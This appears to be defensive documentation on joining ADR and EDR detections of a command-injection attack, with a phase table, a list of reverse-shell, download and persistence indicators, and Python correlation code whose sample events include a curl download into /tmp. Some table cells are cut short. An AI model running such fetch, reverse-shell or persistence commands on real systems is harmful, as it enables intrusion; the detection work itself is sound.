Attack timeline
| Phase | What ADR sees | What EDR sees | Combined picture |
|---|---|---|---|
| Exploit | Command injection in | Nothing yet — the attack is inside the application runtime | ADR provides the trigger and root cause |
| Execution | ADR detects the application spawning an unexpected process | EDR detects: | ADR explains why the process spawned. EDR shows what it did. |
| Persistence | ADR may detect outbound connections to unexpected destinations | EDR detects: downloaded file in /tmp/, cron job modification, reverse shell connection, base64 decoding | Full chain: |
| Containment | ADR: Enable Block Mode for command injection on the affected app | EDR: Kill the malicious process, quarantine the host if needed | Surgical response at both layers |
Correlation logic: ADR exploit event joined with EDR detection on the same target hostname within a 30-minute window. The rule also matches suspicious process patterns.
Suspicious indicators matched by the detection rule:
- Post-exploitation tools: `curl`, `wget`, `nc`, `ncat`, `netcat`
- Reverse shells: `bash -i`, `sh -c`, `/dev/tcp`
- Obfuscation: `base64 -d`
- Persistence: `chmod`, `crontab`, `nohup`, `setsid`
- Suspicious paths: `/tmp/`, `/dev/shm/`, `/var/tmp/`
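The correlation rule above, as an added example (not the vendor's rule engine): it joins ADR exploit events to EDR process events on the same hostname within the 30-minute window and keeps only processes matching the indicator list. Event fields, hostnames, the `orders-api` app and the addresses are assumptions constructed for the sample.

```python
from datetime import datetime, timedelta
# Indicator categories and patterns taken from the detection rule described above
SUSPICIOUS_PATTERNS = {
    "post_exploitation_tool": ["curl", "wget", "nc", "ncat", "netcat"],
    "reverse_shell": ["bash -i", "sh -c", "/dev/tcp"],
    "obfuscation": ["base64 -d"],
    "persistence": ["chmod", "crontab", "nohup", "setsid"],
    "suspicious_path": ["/tmp/", "/dev/shm/", "/var/tmp/"],
}
WINDOW = timedelta(minutes=30)

def match_indicators(cmdline):
    """Return the indicator categories whose patterns appear in a process command line."""
    # Bare tool names match a whole argv token (by basename) so "nc" does not hit "rsync";
    # multi-word and path patterns are matched as substrings ("/dev/tcp/host/port").
    tokens = {t.rsplit("/", 1)[-1] for t in cmdline.split()}
    hits = []
    for category, patterns in SUSPICIOUS_PATTERNS.items():
        if any(p in cmdline if (" " in p or p.startswith("/")) else p in tokens for p in patterns):
            hits.append(category)
    return hits

def correlate(adr_events, edr_events, window=WINDOW):
    """Join ADR exploit events to EDR process events on the same host within `window` after the exploit."""
    alerts = []
    for adr in adr_events:
        for edr in edr_events:
            lag = edr["timestamp"] - adr["timestamp"]
            if edr["hostname"] != adr["hostname"] or not timedelta(0) <= lag <= window:
                continue
            indicators = match_indicators(edr["cmdline"])
            if indicators:  # only processes matching a suspicious pattern become alerts
                alerts.append({"hostname": adr["hostname"], "app": adr["app"],
                               "root_cause": adr["detection"], "process": edr["cmdline"],
                               "indicators": indicators, "lag_min": lag.total_seconds() / 60})
    return alerts

# Constructed sample events (hypothetical hosts, app and addresses; not from a real incident)
T0 = datetime(2024, 1, 1, 12, 0, 0)
ADR_EVENTS = [{"hostname": "web-01", "app": "orders-api", "detection": "command_injection", "timestamp": T0}]
EDR_EVENTS = [
    {"hostname": "web-01", "timestamp": T0 + timedelta(minutes=2), "cmdline": "/usr/bin/curl http://203.0.113.5/x -o /tmp/x"},
    {"hostname": "web-01", "timestamp": T0 + timedelta(minutes=5), "cmdline": "sh -c 'echo aGk= | base64 -d'"},
    {"hostname": "web-01", "timestamp": T0 + timedelta(minutes=45), "cmdline": "crontab -l"},  # outside window
    {"hostname": "web-02", "timestamp": T0 + timedelta(minutes=1), "cmdline": "wget http://203.0.113.5/y"},  # other host
    {"hostname": "web-01", "timestamp": T0 + timedelta(minutes=3), "cmdline": "rsync -a /srv/app /backup"},  # benign
]
if __name__ == "__main__":
    for alert in correlate(ADR_EVENTS, EDR_EVENTS):
        print(alert)
```

Only the two web-01 processes inside the window that match an indicator surface; the late `crontab` call, the other host, and the benign `rsync` (which contains the letters "nc" but not the token) are dropped.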